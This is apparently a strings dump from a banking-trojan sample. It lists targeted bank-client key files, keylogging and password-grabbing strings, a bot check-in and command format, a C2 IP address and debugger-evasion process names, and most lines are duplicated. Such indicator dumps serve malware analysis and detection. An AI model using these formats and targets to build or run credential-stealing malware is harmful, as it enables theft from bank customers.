Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

keys

private.txt

private.txt

public.txt

public.txt

\*.key

\*.key

\self.cer

\self.cer

self.cer

self.cer

self.pub

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.exe

ctunnel.zip

ctunnel.zip

path_ctunnel.txt

path_ctunnel.txt

header.key

header.key

keys99

keys99

\header.key

\header.key

masks2.key

masks2.key

\masks2.key

\masks2.key

masks.key

masks.key

\masks.key

\masks.key

\name.key

\name.key

primary2.key

primary2.key

\primary2.key

\primary2.key

primary.key

primary.key

\primary.key

\primary.key

keys99.zip

keys99.zip

path99.txt

path99.txt

bsi.dll

bsi.dll

&domain=letitbit.net&

&domain=letitbit.net&

cc.txt

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

prv_key.pfx

keys\

keys\

sign.cer

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

sks2xyz.dll

vb_pfx_import

vb_pfx_import

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

secret.key

pubkeys.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

path1.txt

inter.zip

inter.zip

interpro.ini

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{BQQQW777-B777-4e47-8B10-69798A04C732}

Local\{BQQQW777-B777-4e47-8B10-69798A04C732}

cbsmain.dll

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

pass.txt

pass.txt

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

FilialRCon.dll

ISClient.cfg

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

rfk.zip

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

Agava_Client.exe

KeysDiskPath

KeysDiskPath

Agava_Client.ini

Agava_Client.ini

Agava_keys

Agava_keys

keys_path.txt

keys_path.txt

mespro.dll

mespro.dll

AddPSEPrivateKeyEx

AddPSEPrivateKeyEx

core.exe

core.exe

data\id.dbf

data\id.dbf

\data\id.dbf

\data\id.dbf

keys%i.zip

keys%i.zip

path%i.txt

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

cert.pem

cert.pem

Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}

Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}

winmm.dll

winmm.dll

1.2.5

1.2.5

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

%s\%s

%s\%s

RFB d.d

RFB d.d

%s (%s)

%s (%s)

d/d/d d:d

d/d/d d:d

password check failed!

password check failed!

WinSCard.dll

WinSCard.dll

SensApi.dll

SensApi.dll

GetTcpTable

GetTcpTable

IPHLPAPI.DLL

IPHLPAPI.DLL

dbghelp.dll

dbghelp.dll

PSAPI.DLL

PSAPI.DLL

NETAPI32.dll

NETAPI32.dll

DNSAPI.dll

DNSAPI.dll

HttpQueryInfoA

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpAddRequestHeadersA

HttpOpenRequestA

HttpOpenRequestA

WININET.dll

WININET.dll

WS2_32.dll

WS2_32.dll

SHFileOperationA

SHFileOperationA

SHELL32.dll

SHELL32.dll

SHLWAPI.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetSystemWindowsDirectoryA

WinExec

WinExec

SetThreadExecutionState

SetThreadExecutionState

GetWindowsDirectoryW

GetWindowsDirectoryW

KERNEL32.dll

KERNEL32.dll

GetKeyboardState

GetKeyboardState

MsgWaitForMultipleObjects

MsgWaitForMultipleObjects

ActivateKeyboardLayout

ActivateKeyboardLayout

SetKeyboardState

SetKeyboardState

GetKeyboardLayoutList

GetKeyboardLayoutList

EnumChildWindows

EnumChildWindows

GetKeyboardLayout

GetKeyboardLayout

MapVirtualKeyW

MapVirtualKeyW

VkKeyScanExW

VkKeyScanExW

USER32.dll

USER32.dll

SetViewportOrgEx

SetViewportOrgEx

GetViewportOrgEx

GetViewportOrgEx

GDI32.dll

GDI32.dll

RegOpenKeyExA

RegOpenKeyExA

RegCloseKey

RegCloseKey

RegFlushKey

RegFlushKey

RegNotifyChangeKeyValue

RegNotifyChangeKeyValue

RegDeleteKeyA

RegDeleteKeyA

RegEnumKeyExA

RegEnumKeyExA

RegQueryInfoKeyW

RegQueryInfoKeyW

RegOpenKeyExW

RegOpenKeyExW

RegEnumKeyExW

RegEnumKeyExW

ADVAPI32.dll

ADVAPI32.dll

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

gdiplus.dll

gdiplus.dll

MSVCRT.dll

MSVCRT.dll

ShellExecuteW

ShellExecuteW

GetProcessHeap

GetProcessHeap

?456789:;

?456789:;

!"#$%&'()* ,-./0123

!"#$%&'()* ,-./0123

;3 #>6.&

;3 #>6.&

'2, / 0&7!4-)1#

'2, / 0&7!4-)1#

5`6C6Q6}6

5`6C6Q6}6

6f6C6

6f6C6

8 8$8(8,8

8 8$8(8,8

Windows Explorer

Windows Explorer

mavast.com

mavast.com

ya.ru

ya.ru

serverkey.dat

serverkey.dat

\windows\

\windows\

SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d

SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Software\Microsoft\Windows\CurrentVersion\Internet Settings

iexplore.exe

iexplore.exe

MSCTF.Shared.MUTEX.x

MSCTF.Shared.MUTEX.x

Desk_%ux

Desk_%ux

MSCTF.Shared.MAPPING.x

MSCTF.Shared.MAPPING.x

MSCTF.Shared.EVENT.x

MSCTF.Shared.EVENT.x

.Prev

.Prev

.current

.current

HighMemoryEvent_x

HighMemoryEvent_x

Explorer.EXE_840_rwx_01F70000_00068000:

.text

.text

`.rdata

`.rdata

@.data

@.data

@.reloc

@.reloc

http

http

SSSh

SSSh

PASSu:8V

PASSu:8V

PASSu-8V

PASSu-8V

PSSSSSSSh

PSSSSSSSh

t%F;5

t%F;5

12345678

12345678

password1

password1

monkey

monkey

monkey1

monkey1

password

password

Pname.key

Pname.key

\secrets.key

\secrets.key

kernel32.dll

kernel32.dll

\explorer.exe

\explorer.exe

user32.dll

user32.dll

multi_pot.exe

multi_pot.exe

HookExplorer.exe

HookExplorer.exe

proc_analyzer.exe

proc_analyzer.exe

sckTool.exe

sckTool.exe

sniff_hit.exe

sniff_hit.exe

sysAnalyzer.exe

sysAnalyzer.exe

idag.exe

idag.exe

ollydbg.exe

ollydbg.exe

dumpcap.exe

dumpcap.exe

wireshark.exe

wireshark.exe

avp.exe

avp.exe

Software\Microsoft\Windows NT\CurrentVersion

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

%s!%s!X

sysinfo.log

sysinfo.log

scr.jpg

scr.jpg

minidump.bin

minidump.bin

%d.%d.%d.%d

%d.%d.%d.%d

Ý %dh %dm

Ý %dh %dm

%s:%d

%s:%d

Software\Microsoft\Internet Explorer\TypedURLs

Software\Microsoft\Internet Explorer\TypedURLs

url%i

url%i

4.5.11

4.5.11

%dx%d@%d

%dx%d@%d

%c%d:d

%c%d:d

{Windows directory:

{Windows directory:

links.log

links.log

\History.IE5\index.dat

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

\Opera\Opera\typed_history.xml

avast.com

avast.com

93.191.13.100

93.191.13.100

drweb

drweb

eset.com

eset.com

z-oleg.com

z-oleg.com

kltest.org.ru

kltest.org.ru

.comodo.com

.comodo.com

google.com

google.com

Dnsapi.dll

Dnsapi.dll

ws2_32.dll

ws2_32.dll

Referer: hXXp://VVV.google.com

Referer: hXXp://VVV.google.com

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/login.php

/login.php

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

/search.php

/search.php

Winmm.dll

Winmm.dll

Kernel32.dll

Kernel32.dll

Gdi32.dll

Gdi32.dll

ntdll.dll

ntdll.dll

hXXp://

hXXp://

hXXps://

hXXps://

HTTP/1.

HTTP/1.

nspr4.dll

nspr4.dll

PR_OpenTCPSocket

PR_OpenTCPSocket

[[[URL: %s

[[[URL: %s

Process: %s

Process: %s

User-agent: %s]]]

User-agent: %s]]]

{{{%s

{{{%s

Crypt32.dll

Crypt32.dll

CertVerifyCertificateChainPolicy

CertVerifyCertificateChainPolicy

Wininet.dll

Wininet.dll

HttpSendRequestA

HttpSendRequestA

HttpSendRequestW

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExA

HttpSendRequestExW

HttpSendRequestExW

set_url

set_url

microsoft.public.win32.programmer.kernel

microsoft.public.win32.programmer.kernel

\iexplore.exe

\iexplore.exe

keygrab

keygrab

u.jpg

u.jpg

IprivLibEx.dll

IprivLibEx.dll

\\.\PhysicalDrive%u

\\.\PhysicalDrive%u

/topic.php

/topic.php

keylog.txt

keylog.txt

sniff.log

sniff.log

passwords.txt

passwords.txt

%s%u.zip

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

Content-Type: multipart/form-data; boundary=---------------------------%s

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.bing.com

VVV.microsoft.com

VVV.microsoft.com

frd.exe

frd.exe

command=config&update_url=

command=config&update_url=

&port=

&port=

command=load&url=

command=load&url=

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003

hid=%s&username=SYSTEM&compname=%s&bot_version=4.5.11&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s

hid=%s&username=SYSTEM&compname=%s&bot_version=4.5.11&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s

\chrome.exe

\chrome.exe

\svchost.exe

\svchost.exe

\opera.exe

\opera.exe

\cbmain.ex

\cbmain.ex

\iscc.exe

\iscc.exe

\clmain.exe

\clmain.exe

%s.dbf

%s.dbf

%s.DBF

%s.DBF

pop2://%s:%s@%s:%i

pop2://%s:%s@%s:%i

pop3://%s:%s@%s:%i

pop3://%s:%s@%s:%i

nntp://%s:%s@%s:%i

nntp://%s:%s@%s:%i

PTF://%s:%s@%s:%i

PTF://%s:%s@%s:%i

PTF://anonymous:

PTF://anonymous:

AUTHINFO PASS

AUTHINFO PASS

j_password=

j_password=

pass.log

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edClientLogin=

edUserLogin=

edUserLogin=

edPassword=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

&LOGIN_AUTHORIZATION_CODE=

login=

login=

password=

password=

pass_

pass_

ssleay32.dll

ssleay32.dll

advapi32.dll

advapi32.dll

path.txt

path.txt

keys.zip

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.jpg

%s\d.jpg

Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

keys

private.txt

private.txt

public.txt

public.txt

\*.key

\*.key

\self.cer

\self.cer

self.cer

self.cer

self.pub

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.exe

ctunnel.zip

ctunnel.zip

path_ctunnel.txt

path_ctunnel.txt

header.key

header.key

keys99

keys99

\header.key

\header.key

masks2.key

masks2.key

\masks2.key

\masks2.key

masks.key

masks.key

\masks.key

\masks.key

\name.key

\name.key

primary2.key

primary2.key

\primary2.key

\primary2.key

primary.key

primary.key

\primary.key

\primary.key

keys99.zip

keys99.zip

path99.txt

path99.txt

bsi.dll

bsi.dll

&domain=letitbit.net&

&domain=letitbit.net&

cc.txt

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

prv_key.pfx

keys\

keys\

sign.cer

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

sks2xyz.dll

vb_pfx_import

vb_pfx_import

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

secret.key

pubkeys.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

path1.txt

inter.zip

inter.zip

interpro.ini

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{BQQQW777-B777-4e47-8B10-69798A04C732}

Local\{BQQQW777-B777-4e47-8B10-69798A04C732}

cbsmain.dll

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

pass.txt

pass.txt

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

FilialRCon.dll

ISClient.cfg

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

rfk.zip

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

Agava_Client.exe

KeysDiskPath

KeysDiskPath

Agava_Client.ini

Agava_Client.ini

Agava_keys

Agava_keys

keys_path.txt

keys_path.txt

mespro.dll

mespro.dll

AddPSEPrivateKeyEx

AddPSEPrivateKeyEx

core.exe

core.exe

data\id.dbf

data\id.dbf

\data\id.dbf

\data\id.dbf

keys%i.zip

keys%i.zip

path%i.txt

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

cert.pem

cert.pem

Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}

Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}

winmm.dll

winmm.dll

1.2.5

1.2.5

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

%s\%s

%s\%s

RFB d.d

RFB d.d

%s (%s)

%s (%s)

d/d/d d:d

d/d/d d:d

password check failed!

password check failed!

WinSCard.dll

WinSCard.dll

SensApi.dll

SensApi.dll

GetTcpTable

GetTcpTable

IPHLPAPI.DLL

IPHLPAPI.DLL

dbghelp.dll

dbghelp.dll

PSAPI.DLL

PSAPI.DLL

NETAPI32.dll

NETAPI32.dll

DNSAPI.dll

DNSAPI.dll

HttpQueryInfoA

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpAddRequestHeadersA

HttpOpenRequestA

HttpOpenRequestA

WININET.dll

WININET.dll

WS2_32.dll

WS2_32.dll

SHFileOperationA

SHFileOperationA

SHELL32.dll

SHELL32.dll

SHLWAPI.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetSystemWindowsDirectoryA

WinExec

WinExec

SetThreadExecutionState

SetThreadExecutionState

GetWindowsDirectoryW

GetWindowsDirectoryW

KERNEL32.dll

KERNEL32.dll

GetKeyboardState

GetKeyboardState

MsgWaitForMultipleObjects

MsgWaitForMultipleObjects

ActivateKeyboardLayout

ActivateKeyboardLayout

SetKeyboardState

SetKeyboardState

GetKeyboardLayoutList

GetKeyboardLayoutList

EnumChildWindows

EnumChildWindows

GetKeyboardLayout

GetKeyboardLayout

MapVirtualKeyW

MapVirtualKeyW

VkKeyScanExW

VkKeyScanExW

USER32.dll

USER32.dll

SetViewportOrgEx

SetViewportOrgEx

GetViewportOrgEx

GetViewportOrgEx

GDI32.dll

GDI32.dll

RegOpenKeyExA

RegOpenKeyExA

RegCloseKey

RegCloseKey

RegFlushKey

RegFlushKey

RegNotifyChangeKeyValue

RegNotifyChangeKeyValue

RegDeleteKeyA

RegDeleteKeyA

RegEnumKeyExA

RegEnumKeyExA

RegQueryInfoKeyW

RegQueryInfoKeyW

RegOpenKeyExW

RegOpenKeyExW

RegEnumKeyExW

RegEnumKeyExW

ADVAPI32.dll

ADVAPI32.dll

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

gdiplus.dll

gdiplus.dll

MSVCRT.dll

MSVCRT.dll

ShellExecuteW

ShellExecuteW

GetProcessHeap

GetProcessHeap

?456789:;

?456789:;

!"#$%&'()* ,-./0123

!"#$%&'()* ,-./0123

;3 #>6.&

;3 #>6.&

'2, / 0&7!4-)1#

'2, / 0&7!4-)1#

ADM!XP9!F9BE9A8A

ADM!XP9!F9BE9A8A

%WinDir%\apppatch\hwcmqr.exe

%WinDir%\apppatch\hwcmqr.exe

%Documents and Settings%\%current user%\Application Data\

%Documents and Settings%\%current user%\Application Data\

5`6C6Q6}6

5`6C6Q6}6

6f6C6

6f6C6

8 8$8(8,8

8 8$8(8,8

Windows Explorer

Windows Explorer

mavast.com

mavast.com

ya.ru

ya.ru

serverkey.dat

serverkey.dat

\windows\

\windows\

SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d

SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Software\Microsoft\Windows\CurrentVersion\Internet Settings

iexplore.exe

iexplore.exe

MSCTF.Shared.MUTEX.x

MSCTF.Shared.MUTEX.x

Desk_%ux

Desk_%ux

MSCTF.Shared.MAPPING.x

MSCTF.Shared.MAPPING.x

MSCTF.Shared.EVENT.x

MSCTF.Shared.EVENT.x

.Prev

.Prev

.current

.current

HighMemoryEvent_x

HighMemoryEvent_x